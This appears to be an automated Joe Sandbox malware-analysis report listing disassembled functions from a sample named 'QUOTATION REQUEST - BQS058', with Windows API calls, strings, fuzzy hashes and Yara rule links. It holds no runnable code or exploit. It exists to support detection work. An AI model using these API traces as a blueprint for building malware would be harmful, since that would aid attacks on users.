Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: df339a17bb8f71bec549bfd39ee474a507310f1d99f76634d7aaf5b179a1ef6c
Instruction ID: a8cb35c91872d954cfba26f67b66ed3a060a6ce774e6fa823421562e3dec7dd0
Opcode Fuzzy Hash: df339a17bb8f71bec549bfd39ee474a507310f1d99f76634d7aaf5b179a1ef6c
Instruction Fuzzy Hash: E221657590030ABBDB20AF29D808A9A7BFCEF85720F104A59FDE1D72D0DB729654CB54

Function 01036E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 01036E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01036EBB
GetStdHandle.KERNEL32(000000F6), ref: 01036ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 01036F06

Strings

nul, xrefs: 01036F01

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 7c1e3c123b2b6046db3ef45f0d331f53cfd57ffa5afbcd3ddf565e9a7cb40468
Instruction ID: 869a1d8eb8d9c463f622f5a8c9f33326163f5fcae8c6f293cda8e9916bb2816d
Opcode Fuzzy Hash: 7c1e3c123b2b6046db3ef45f0d331f53cfd57ffa5afbcd3ddf565e9a7cb40468
Instruction Fuzzy Hash: 63219071500306ABEB209F6DC804AAA77ECEF85720F200A59F9E0D72C0DB76A6548B60

Function 0103AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0103AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0103ACA8
__swprintf.LIBCMT ref: 0103ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0105F910), ref: 0103ACFF

Strings

%lu, xrefs: 0103ACBB

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: f1937eababa80b27a14b1119e3e12e35e32b1617eadc393bf49b4d5a5db8b23c
Instruction ID: 96e44bcc0048dbc71ebf313e44e3955b3d38733e1f118b045f52056d96eec76f
Opcode Fuzzy Hash: f1937eababa80b27a14b1119e3e12e35e32b1617eadc393bf49b4d5a5db8b23c
Instruction Fuzzy Hash: 52216031A0020AAFCB10EF69C944DEF7BB8EF89714B044069F949DB351DA75EA41DB61

Function 01031AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 01031B19

Strings

KEYS, xrefs: 01031B30
REMOVE, xrefs: 01031B1F
APPEND, xrefs: 01031B52
EXISTS, xrefs: 01031B41

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 82c369661b978d5912cfb843f79d7fb1d2136a7b9a0f982145f2a879360ea82b
Instruction ID: 77893af6ad9103f6c716f5dea66f0f46e196ebbdf6ca7fada2068410e89d036d
Opcode Fuzzy Hash: 82c369661b978d5912cfb843f79d7fb1d2136a7b9a0f982145f2a879360ea82b
Instruction Fuzzy Hash: C511C4309002098FCF04FFA8DC618FEB3B4FF59304B548495D89467792EB365906DB50

Function 0104EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0104EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0104EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0104ED6A
CloseHandle.KERNEL32(?), ref: 0104EDEB

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 1fdf9c198d368ae23ec55eb020f97bc67d5cb3589c823ce8ecd468e3d3fe8f1d
Instruction ID: 9f848717c961e3f893639ff3eca7b5f0793c3e83f10fcf11f2d29b13a19ec40a
Opcode Fuzzy Hash: 1fdf9c198d368ae23ec55eb020f97bc67d5cb3589c823ce8ecd468e3d3fe8f1d
Instruction Fuzzy Hash: 658160B16043019FD760EF28CC86F2AB7E6AF44710F44881EF995DB3D2D6B9AC418B91

Function 01050037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010500FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0105013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01050183
RegCloseKey.ADVAPI32(?,?), ref: 010501AF
RegCloseKey.ADVAPI32(00000000), ref: 010501BC

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 423db01e79af2756eed4d62f0408789369c0731fc13999443a7846402c352cb6
Instruction ID: 3f780180c723a9d9ba9ce850ab3635ae1abc64dd71568dcddf438a288c1785f6
Opcode Fuzzy Hash: 423db01e79af2756eed4d62f0408789369c0731fc13999443a7846402c352cb6
Instruction Fuzzy Hash: 4B516631208205AFD754EF68CC81EAFB7E9AF84304F44481EF9858B291EB35E904DB52

Function 0104D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0104D927
GetProcAddress.KERNEL32(00000000,?), ref: 0104D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0104D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0104DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0104DA21

Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01037896,?,?,00000000), ref: 00FD5A2C
Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01037896,?,?,00000000,?,?), ref: 00FD5A50

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: d540b1ae43455bd2589052d8b8cc33d177ab42273d2fb9149c67427329f52fbc
Instruction ID: 7a044ab9e2d1a87a748163808699719138162965cb427d46a383bbff7135dba3
Opcode Fuzzy Hash: d540b1ae43455bd2589052d8b8cc33d177ab42273d2fb9149c67427329f52fbc
Instruction Fuzzy Hash: 6A513D75A04205DFCB00EFA8C4949ADB7F6FF19310B0880AAE895AB312D739ED45CF91

Function 0103E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0103E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0103E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0103E687

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0103E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0103E6B4

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 46407ddf85873e5a5b95735f3ca4a859a9ca7433c1d1e8a819b90da5def8bc75
Instruction ID: bd7c5a92e9c2accc682e343f9be95b839a4ff9d811a4cfc04b2e3d729cf180c3
Opcode Fuzzy Hash: 46407ddf85873e5a5b95735f3ca4a859a9ca7433c1d1e8a819b90da5def8bc75
Instruction Fuzzy Hash: 98513C35A00205DFCB01EFA4C9819AEBBF5EF49350F188099E949AB362CB75ED11EF50

Function 0105A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eded7f61fb17eb214451d143f44bb0b47e0125d2f200dd60732baf26b4ea184
Instruction ID: 4cec05af12c93e30e2fdac58380f0c5511a9679b291c2ca56bd76bd8082688eb
Opcode Fuzzy Hash: 3eded7f61fb17eb214451d143f44bb0b47e0125d2f200dd60732baf26b4ea184
Instruction Fuzzy Hash: 73419335A04204EFD7A1DA68CC58FABBFE8FB09390F040295FE95A72D1CB349941DB64

Function 00FD2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00FD2357
ScreenToClient.USER32(010957B0,?), ref: 00FD2374
GetAsyncKeyState.USER32(00000001), ref: 00FD2399
GetAsyncKeyState.USER32(00000002), ref: 00FD23A7

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 848fe4a80551ddb1f3ff1ec9334ac71076633536522b53d4dde38e52b185bcb6
Instruction ID: 9d6f58db873de636c2a82c7386100586170c0d2066e80b135e5f4454ddc1081e
Opcode Fuzzy Hash: 848fe4a80551ddb1f3ff1ec9334ac71076633536522b53d4dde38e52b185bcb6
Instruction Fuzzy Hash: 4A41B235A04106FBEF669F68C844AEEBBB5FB15320F24435AF868922D0C7359950EF91

Function 010263AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010263E7
TranslateAcceleratorW.USER32(?,?,?), ref: 01026433
TranslateMessage.USER32(?), ref: 0102645C
DispatchMessageW.USER32(?), ref: 01026466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01026475

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 0ab8d20ec3fd4643373f8b0c990a8414c61111ef596fc83e292b2c70be2bac34
Instruction ID: 471e39d6da7e2f512dde4abb614042e653b167763438b1a80f13bf06ce088954
Opcode Fuzzy Hash: 0ab8d20ec3fd4643373f8b0c990a8414c61111ef596fc83e292b2c70be2bac34
Instruction Fuzzy Hash: 4931C6319002669FDB75CE75DC54BB7BBEDBB05300F1441A6E9E1C3195EB2B9045C760

Function 01028A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 01028A30
PostMessageW.USER32(?,00000201,00000001), ref: 01028ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 01028AE2
PostMessageW.USER32(?,00000202,00000000), ref: 01028AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 01028AF8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 245452b1ab352e931935665be3260e86f3c5ae0b53badf691d18d4c3c2571153
Instruction ID: 86f156e708676acdaa850d54ebc8feb0ca677ab068f57daa7f7b8c759d1c373e
Opcode Fuzzy Hash: 245452b1ab352e931935665be3260e86f3c5ae0b53badf691d18d4c3c2571153
Instruction Fuzzy Hash: AB31C07150022AEBEF14CFA8D94CA9E3BF5FB05315F10825AF965E71C1C7B49914CB90

Function 0102B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0102B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0102B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0102B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0102B27F
_wcsstr.LIBCMT ref: 0102B289

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 0f27d01eaa733d0f2a1831127edc92aa80758b6729b301925d6e4c2a29dd804a
Instruction ID: 776d766a9b23a97c41d76a662578b1e10789853f8d1565ab3ee21ed81c258a29
Opcode Fuzzy Hash: 0f27d01eaa733d0f2a1831127edc92aa80758b6729b301925d6e4c2a29dd804a
Instruction Fuzzy Hash: DB2104326043157BEB259B799C09E7F7BDCDF4A760F004169F944DA1A2EE69D84093A0

Function 0105B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623

GetWindowLongW.USER32(?,000000F0), ref: 0105B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0105B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0105B1CF
GetSystemMetrics.USER32(00000004), ref: 0105B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01040E90,00000000), ref: 0105B216

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 0b49c6aaa3afcbd3eae640b52c1ed93d28686a81f0e6c55e3696e398eb11f557
Instruction ID: ab2754dd36c495bfa51fb63f361a5cfd71b11ffb996def20c9c967bf45d056d9
Opcode Fuzzy Hash: 0b49c6aaa3afcbd3eae640b52c1ed93d28686a81f0e6c55e3696e398eb11f557
Instruction Fuzzy Hash: 9A21B171914216AFCBA09E39DC08A6F3BA5FB05361F104729FEB2D71D0D735A810CB90

Function 01029307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01029320

Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01029352
__itow.LIBCMT ref: 0102936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01029392
__itow.LIBCMT ref: 010293A3

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: c24c93f5afe031157cd6e6154a6555f4298d04f8568a1046c0740baa418294dd
Instruction ID: 5081546d02a3726ab24e7e295500ab67b05bc5b103a0d551157dc95a944d2b9f
Opcode Fuzzy Hash: c24c93f5afe031157cd6e6154a6555f4298d04f8568a1046c0740baa418294dd
Instruction Fuzzy Hash: CC212C317003297BDB10AA648C85EEF7BEDEF88714F049026FE84DB2C1D674C94197A1

Function 01045A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 01045A6E
GetForegroundWindow.USER32 ref: 01045A85
GetDC.USER32(00000000), ref: 01045AC1
GetPixel.GDI32(00000000,?,00000003), ref: 01045ACD
ReleaseDC.USER32(00000000,00000003), ref: 01045B08

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 140fe34af1b2f833e9b5954d360e63b986cc3bb82da05ec527c9f38c3f16faf3
Instruction ID: fd8b1eb5a336c056e7e950d60d6aea715d71f1e30890c521fe6602008e8c0d81
Opcode Fuzzy Hash: 140fe34af1b2f833e9b5954d360e63b986cc3bb82da05ec527c9f38c3f16faf3
Instruction Fuzzy Hash: 4C218475A00205AFD714EFA5DC88AAABBE9EF48310F048479F889D7351CB79ED00DB90

Function 00FD12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FD134D
SelectObject.GDI32(?,00000000), ref: 00FD135C
BeginPath.GDI32(?), ref: 00FD1373
SelectObject.GDI32(?,00000000), ref: 00FD139C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 5b639d2f45b67f78b34ab7aa3dc4000ee7cd6a0d56f4539aa973362e7d0f2095
Instruction ID: 5163852bfb88c51d48714171d10ff0fa8fa24721cb01e0257d65f8b6dbe46f77
Opcode Fuzzy Hash: 5b639d2f45b67f78b34ab7aa3dc4000ee7cd6a0d56f4539aa973362e7d0f2095
Instruction Fuzzy Hash: F4217431801309EFDB229F16DC0476B7BE9FB04321F284217F490AA294D77A9891EF90

Function 01034A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 01034ABA
__beginthreadex.LIBCMT ref: 01034AD8
MessageBoxW.USER32(?,?,?,?), ref: 01034AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01034B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01034B0A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

